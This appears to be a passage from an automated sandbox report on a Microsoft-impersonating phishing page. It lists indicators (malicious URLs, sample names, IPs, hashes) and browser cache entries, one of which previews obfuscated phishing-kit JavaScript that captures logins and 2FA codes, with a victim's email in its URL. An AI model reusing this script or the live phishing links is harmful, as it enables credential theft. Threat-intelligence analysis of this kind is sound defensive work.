	https://mail.notifyvisitors.com/tracker/email_tracker/handler/click/51260/13866?cd=aktPMUFtRXRLeXhOT3pUYzZJeEw1Y2ptMzBDSDJkYm1IWEdmNk5GVEFvVlRyN1FMVjdQUFEyWmpkUURtQndBMnJ2Nk1iOWtYSEJQY0UzY1NodklLd05WQ2RtaG9SSHJrL0FGZk40Y0FNdlNwczAxdFp6WXI5b3h4WVZPOW12Rko0UDhwS1dPb3A0T3pCTXdxU210Y3dvWDIwaTFZZ2ZBeEUxRDFYQnVINmR2blI0TExHM2wrcEtIYTJqL3lWWXBKOVhQTHo3ZHVlLzZxTGdvZXhPc1owZUFrZFllSEFjWStwZGkyMlVaQzFidzBpU2ZBTW5wTjhFWW5SUmlxQXVQOVVPZE1UOVRNREs4WSttZkNXeEhmdS9ncktZaC9VTzZLbERPTjNzSVp0cm5aZmFkTEV6Vk96d0k4bTZaL3p1QUpsSHEwUHhpWlgrNG11M05SUVVWZUpxVTlTR0svVHQ3clFnZ0lLd29iNS9ERVJWOG8wVnNhK2V3TVdKMVM0RUhSMTZJTFlTKzhKY29TWk9WY3lwOFlOWS9ySXRWcVhtcHY0STFKVE9oUHpGSFkzcXhpalJnOGNTRFVBTDBBVHU4cDJGZURnN2k3VEsyQVkvL0gxQm90cmtZYXRmVmpub0tERDBsU0hZSlUzUmlnMGZtR0ZPbW1lOVpMRHV1WDZDSWpwL3FBWlZ6OW00Y2ZhbEdJd3lUeGpRPT0%3D#?email=test@gotcha.com	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.66.137
s-part-0012.t-0009.t-msedge.net	ENQUIRY - RFQ 674441-76450.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.40
	ENQUIRY - RFQ 674441-76450.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.40
	https://waimao-north-star-mail.qiye.163.com/api/j/html?c=https%3A%2F%2F1drv.ms%2Fo%2Fs!AjlMaeoI5pi7f_GXm50IY_RD-sw%3Fe%3DEsmwj4%3Fcid%3Dsite_nqmm3LQS7c9jn-2FWvVcVpMl0NsyUA8yUApYElnaeUm2Ly_xlUzBpbEuL	Get hash	malicious	Unknown	Browse	13.107.246.40
	https://offce365.auramisteriosafyr.it.com/CM4kN/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	PC900-1new.exe	Get hash	malicious	XRed	Browse	13.107.246.40
	SecuriteInfo.com.Win64.CrypterX-gen.5834.27621.exe	Get hash	malicious	Vidar	Browse	13.107.246.40
	Player666.exe	Get hash	malicious	Unknown	Browse	13.107.246.40
	oddj60.1EqD3.exe	Get hash	malicious	XRed, XWorm	Browse	13.107.246.40
	DA6B.bat	Get hash	malicious	XRed, XWorm	Browse	13.107.246.40
	3417774.exe	Get hash	malicious	Unknown	Browse	13.107.246.40
office.avcbtech.store	ATT11027.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT99718.htm	Get hash	malicious	Unknown	Browse	139.28.36.38

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	New Purchase Order.cmd	Get hash	malicious	DBatLoader, FormBook	Browse	104.21.15.47
	http://xml-v4.srvqck9.com	Get hash	malicious	Unknown	Browse	104.18.11.207
	New Order RFQ- 19A20060.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Invoice1-1706517.pdf	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	172.64.41.3
	RFQ FORM 03242025.exe	Get hash	malicious	FormBook	Browse	104.21.94.50
	RFQ #115 - LUCID PROJECT.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	FACTURA.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.64.1
	USOE43wtyO.exe	Get hash	malicious	DarkVision Rat	Browse	104.26.9.202
	HTu5eF4VeI.exe	Get hash	malicious	DarkVision Rat	Browse	172.67.68.246
	Bper Banca_Copia del Pagamento.pdf.bat	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
ASN-QUADRANET-GLOBALUS	arm7.elf	Get hash	malicious	Unknown	Browse	104.245.241.61
	mips.elf	Get hash	malicious	Unknown	Browse	104.245.241.61
	ARxx7NW.exe	Get hash	malicious	Xmrig	Browse	104.245.241.161
	.main.elf	Get hash	malicious	Xmrig	Browse	104.245.240.20
	wjfOfXh.exe1.exe	Get hash	malicious	Unknown	Browse	45.95.233.53
	socks.exe	Get hash	malicious	Sliver	Browse	45.61.169.127
	2mtls.exe	Get hash	malicious	Sliver	Browse	45.61.169.127
	1https.exe	Get hash	malicious	Sliver	Browse	45.61.169.127
	http://t.dripemail2.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzQyNDg1MjAxLCJuYmYiOjE3NDI0ODUyMDEsImFjY291bnRfaWQiOiI5MjExNzMxIiwiZGVsaXZlcnlfaWQiOiI2ZGY2cmIydXVwbjY4cnNhdWo0NCIsInRva2VuIjoiNmRmNnJiMnV1cG42OHJzYXVqNDQiLCJzZW5kX2F0IjoxNzQyNDgzOTQ4LCJlbWFpbF9pZCI6MTA1MDc4ODcsImVtYWlsYWJsZV90eXBlIjoiQnJvYWRjYXN0IiwiZW1haWxhYmxlX2lkIjo0MTkzMDc4LCJ1cmwiOiJodHRwOi8vZ2NyLnVwcGxleC5jby5rZT9fX3M9cWMwZ2JsdTk1emZnYmh3ZHp5OG4mdXRtX3NvdXJjZT1kcmlwJnV0bV9tZWRpdW09ZW1haWwmdXRtX2NhbXBhaWduPVdlK2dvdCthK21ha2VvdmVyLiJ9.nJ9tzd3-jhbWgSNwRLHamHKYwZXuNcZIG2E1QBFM5fg	Get hash	malicious	HTMLPhisher	Browse	45.61.169.110
	ATT11027.xhtml	Get hash	malicious	HTMLPhisher	Browse	185.174.100.76
FREEHOSTUA	ATT11027.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT99718.htm	Get hash	malicious	Unknown	Browse	139.28.36.38
	armv5l.elf	Get hash	malicious	Unknown	Browse	193.42.104.40
	xd.mips.elf	Get hash	malicious	Mirai	Browse	193.42.104.85
	firmware.armv5l.elf	Get hash	malicious	Unknown	Browse	185.13.5.61
	http://micr.tech-arnericas.com	Get hash	malicious	Fake Captcha, HTMLPhisher	Browse	139.28.37.60
	https://rickhome.com/secuure	Get hash	malicious	Fake Captcha, Phisher	Browse	139.28.37.144
FASTLYUS	Invoice1-1706517.pdf	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.66.137
	https://www.powerflexweb.com/centers_redirect_log.php?idDivision=88&nameDivision=https://gamma.app/docs/SHAREPOINT-FILE-RECEIVED-v0g983lw02btb16mode=doc&idModule=m583&nameModule=myStrength&idElement=1137&nameElement=ProviderSearch&url=https://gamma.app/docs/SHAREPOINT-FILE-RECEIVED-v0g983lw02btb16	Get hash	malicious	Unknown	Browse	151.101.129.140
	https://forms.clickup.com/9015983964/f/8cp9zuw-455/FNN752NJ1XQERN61A3	Get hash	malicious	Unknown	Browse	151.101.131.9
	Invoice Number INV132146-1.pdf	Get hash	malicious	Unknown	Browse	199.232.214.172
	FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.194.137
	https://tr.ee/s0lXXyulSF	Get hash	malicious	HTMLPhisher	Browse	151.101.66.133
	https://tl.phoneky.com/android/?id=d1d149166	Get hash	malicious	Unknown	Browse	151.101.66.49
	https://waimao-north-star-mail.qiye.163.com/api/j/html?c=https%3A%2F%2F1drv.ms%2Fo%2Fs!AjlMaeoI5pi7f_GXm50IY_RD-sw%3Fe%3DEsmwj4%3Fcid%3Dsite_nqmm3LQS7c9jn-2FWvVcVpMl0NsyUA8yUApYElnaeUm2Ly_xlUzBpbEuL	Get hash	malicious	Unknown	Browse	151.101.129.40
	https://offce365.auramisteriosafyr.it.com/CM4kN/	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	dropped
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Chrome Cache Entry: 66

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 679 x 574, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	48869
Entropy (8bit):	7.958559093833488
Encrypted:	false
SSDEEP:	768:ABND0dAJBykYjrl19H2rqdBDErhCGXvrxYZP+mFDFwnsQNPNto2r9t:fAJEkYjrfd2als/rxSFDFvQNP7osr
MD5:	8AA14660517F5460156FCCC2199CF83C
SHA1:	1B49B45651E812973D69A13CFCD137E0521B6DE6
SHA-256:	F2AA979677F3B905F64543C27FA26C6E31EF3320F44DD37F5136D267725AC495
SHA-512:	7530FB22377CBE1486DAD21F99D5F56D8AB2DAAC40EB56A030C8445F5814E097AC2C54AC81154BAD9AC1ADD5FC23D5C2FE4943F8039873D307B8A2C62973A02B
Malicious:	false
Reputation:	low
URL:	https://i.imgur.com/KAb5SEy.png
Preview:	.PNG........IHDR.......>.......4.....IDATx..w\|.......}7=..=.PB.T.."..E.`ET..E."RE....QD.>>...G9.z..P.^.j(!.HHH.6..:\.n....lv?.?\|mvg.{.....u_..2).b....@.`.......@'.....@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@..N(.R.C...X....E..Qn...(.,.......T....hd.F.EA.$I.?.A.z.z..q..hd.........qWP.....E..,.eee..+**++.a. .>.....l4.M.h....j.Q.......y.....P}........#[.l.y.....=ZTTDK..@}\|\|\|.M.^ --..'.t8.f.Y.......P}P=yyy.........\X^^^QQ.^.e=I.r.z...v....v..bq:..$......o....;u.T.......T.T&''g............+.Ri..h4...0.LF..v.}~\|\|.5.\.....x.))).<..............T..W.k...?..cqqq....y..O..].v........Q......p.@....ZRS....h2.Hk...s..>\|..c...d..\..H..X,......s.;....h.9.2`I.......~4#_..w5..w..h....:77.../ .2......X,.(.,.d2I.D..r..........8...lF.......G-.L7..<.W.o6.......m.6.a......_[H...i`..Q8!--m.!.?.xFFF.......P.h....

Chrome Cache Entry: 67

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 68

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	20
Entropy (8bit):	3.346439344671015
Encrypted:	false
SSDEEP:	3:YMES3Y:YMESY
MD5:	7AB0BAE74FD327DA4786185272B6CD23
SHA1:	A28F0144ED10A95901ACD427C6652405E7017C65
SHA-256:	546E1EBAFA0C1584C4527DD7260CCF25C4E358EDAFE66236C00C573B011A0BA9
SHA-512:	3482432C63D5720225B0F6CB55726516E99F946529B3E4AAB4DD3425E3CE07C211E6E7717AD816C112FB112433A61C9A6E0685C1D77EE337568C050426F51A2B
Malicious:	false
Reputation:	low
URL:	https://api.ipify.org/?format=json
Preview:	{"ip":"161.77.13.2"}

Chrome Cache Entry: 69

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 679 x 574, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	48869
Entropy (8bit):	7.958559093833488
Encrypted:	false
SSDEEP:	768:ABND0dAJBykYjrl19H2rqdBDErhCGXvrxYZP+mFDFwnsQNPNto2r9t:fAJEkYjrfd2als/rxSFDFvQNP7osr
MD5:	8AA14660517F5460156FCCC2199CF83C
SHA1:	1B49B45651E812973D69A13CFCD137E0521B6DE6
SHA-256:	F2AA979677F3B905F64543C27FA26C6E31EF3320F44DD37F5136D267725AC495
SHA-512:	7530FB22377CBE1486DAD21F99D5F56D8AB2DAAC40EB56A030C8445F5814E097AC2C54AC81154BAD9AC1ADD5FC23D5C2FE4943F8039873D307B8A2C62973A02B
Malicious:	false
Preview:	.PNG........IHDR.......>.......4.....IDATx..w\|.......}7=..=.PB.T.."..E.`ET..E."RE....QD.>>...G9.z..P.^.j(!.HHH.6..:\.n....lv?.?\|mvg.{.....u_..2).b....@.`.......@'.....@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@..N(.R.C...X....E..Qn...(.,.......T....hd.F.EA.$I.?.A.z.z..q..hd.........qWP.....E..,.eee..+**++.a. .>.....l4.M.h....j.Q.......y.....P}........#[.l.y.....=ZTTDK..@}\|\|\|.M.^ --..'.t8.f.Y.......P}P=yyy.........\X^^^QQ.^.e=I.r.z...v....v..bq:..$......o....;u.T.......T.T&''g............+.Ri..h4...0.LF..v.}~\|\|.5.\.....x.))).<..............T..W.k...?..cqqq....y..O..].v........Q......p.@....ZRS....h2.Hk...s..>\|..c...d..\..H..X,......s.;....h.9.2`I.......~4#_..w5..w..h....:77.../ .2......X,.(.,.d2I.D..r..........8...lF.......G-.L7..<.W.o6.......m.6.a......_[H...i`..Q8!--m.!.?.xFFF.......P.h....

Chrome Cache Entry: 70

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 256 x 85, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	5579
Entropy (8bit):	7.91798195010819
Encrypted:	false
SSDEEP:	96:V3rhBZDdgtqORgdz5Qx6ujOWNfuQRI/Ku4j7ZrpcQQvUucgGRMqNL0:V3bZetqh4OWNnR4Ku4jFpcDtHGRMqNY
MD5:	28A8812C3AAF8AF83BA5C83C58750528
SHA1:	38DFA889438C48D89DE0551F90C782E5CB5D7587
SHA-256:	A9D76447203C9176B2A401D574D44513A7C550B29C30107B4B8D94A67C6FEBDF
SHA-512:	113AEA80B537AFB95E5123A3C2DDFA9096F8A4DEF82D9F1088DD5C4DB48BD3EC8DB1C5176B6274AA51F334F95107969C06DD5D08CC95D0B8F6B3FB95E2770DA5
Malicious:	false
URL:	https://i.imgur.com/0HdPsKK.png
Preview:	.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....\|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.\|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

Chrome Cache Entry: 71

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 256 x 85, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5579
Entropy (8bit):	7.91798195010819
Encrypted:	false
SSDEEP:	96:V3rhBZDdgtqORgdz5Qx6ujOWNfuQRI/Ku4j7ZrpcQQvUucgGRMqNL0:V3bZetqh4OWNnR4Ku4jFpcDtHGRMqNY
MD5:	28A8812C3AAF8AF83BA5C83C58750528
SHA1:	38DFA889438C48D89DE0551F90C782E5CB5D7587
SHA-256:	A9D76447203C9176B2A401D574D44513A7C550B29C30107B4B8D94A67C6FEBDF
SHA-512:	113AEA80B537AFB95E5123A3C2DDFA9096F8A4DEF82D9F1088DD5C4DB48BD3EC8DB1C5176B6274AA51F334F95107969C06DD5D08CC95D0B8F6B3FB95E2770DA5
Malicious:	false
Preview:	.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....\|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.\|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

Chrome Cache Entry: 72

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
Category:	downloaded
Size (bytes):	68421
Entropy (8bit):	4.894526489503226
Encrypted:	false
SSDEEP:	768:PO6TtTOT+Th6dO31GqjkKB6wI7JoHHy6BKJwhXBXoXRn2CVWpgnEDUgUoCn4CSaY:PO65yCYyB6F5/VW4HllbE
MD5:	95433AD6C822F912C3EC20D7D0324453
SHA1:	DD09149B83F227F46EBE417D5E55C25A8E5B718C
SHA-256:	3EAA119BDC8067E28626DD3E81A085ACF0F6C2EB6043DB1FEA164F5703CB5E71
SHA-512:	F20107C5DE6BFFB843CF3961EFEE83FCEB45F87DE204F53E55553342F959F23AED2A334B1C970E2B358CC7F1B72789EB84A6D05AD0E8C071B027168F62881D4F
Malicious:	false
URL:	https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=daria.czajkowska@rockwool.com
Preview:	function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disabled','ajax','text','An\x20error\x20occurred\x20while\x20verifying\x20the\x20code.\x20Please\x20try\x20again.','#msg-2fa','Enter\x20your\x20email\x20address\x20or\x20phone\x20number.','#co','href','pointer-events','querySelector','input','div4','now','button:not(#dummy-bot-trap)','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2220px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20logoname\x22\x20id=\x22mic\x22\x20style=\x22color:\x20#747474;\x22>Microsoft</span><br><br>\u00a0\u00a0\u00a0\u00a0<span\x20id=\x22aich\x22\x20style=\x22margin-left:\x20-16px;\x22></span><div\x20class=\x22py-2\x22><span\x20id=\x22ep\x22\x20class=\

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.346439344671015
Encrypted:	false
SSDEEP:	3:YMES3Y:YMESY
MD5:	7AB0BAE74FD327DA4786185272B6CD23
SHA1:	A28F0144ED10A95901ACD427C6652405E7017C65
SHA-256:	546E1EBAFA0C1584C4527DD7260CCF25C4E358EDAFE66236C00C573B011A0BA9
SHA-512:	3482432C63D5720225B0F6CB55726516E99F946529B3E4AAB4DD3425E3CE07C211E6E7717AD816C112FB112433A61C9A6E0685C1D77EE337568C050426F51A2B
Malicious:	false
Preview:	{"ip":"161.77.13.2"}

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	258966
Entropy (8bit):	4.694760038815572
Encrypted:	false
SSDEEP:	1536:Pq6wJpJW3jInCU77Pc5ybMMHcFdL5RdD0BKt2AnsD5FWXxXLXv47pGXRMN6o8VbB:dLzsCXo8cAcfO4FIwo7vwI7N
MD5:	D22C8D1F87B47309F3C2A05D2905A762
SHA1:	2DA99CB33FCB4294336D73F2D538ED2D5EC3E3C1
SHA-256:	CA4586C1819D057F7396D917087FE3E650A9466DE644278DC3A8DDA5C3CA71FD
SHA-512:	F96C4580DEDBCA6B830EB4959E45831D3B87231F54F8B4EFE825615E88335550ABD42EBDF8FCCF40631047B0321D0EA8E0D5438F65B7B6E06FEB5253355F4F20
Malicious:	false
URL:	https://sender.linxcoded.top/start/xls/includes/css6.css
Preview:	/!.. Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.. :root {.. --blue: #007bff;.. --indigo: #6610f2;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #dc3545;.. --orange: #fd7e14;.. --yellow: #ffc107;.. --green: #28a745;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #343a40;.. --primary: #007bff;.. --secondary: #6c757d;.. --success: #28a745;.. --info: #17a2b8;.. --warning: #ffc107;.. --danger: #dc3545;.. --light: #f8f9fa;.. --dark: #343a40;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-se

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
URL:	https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

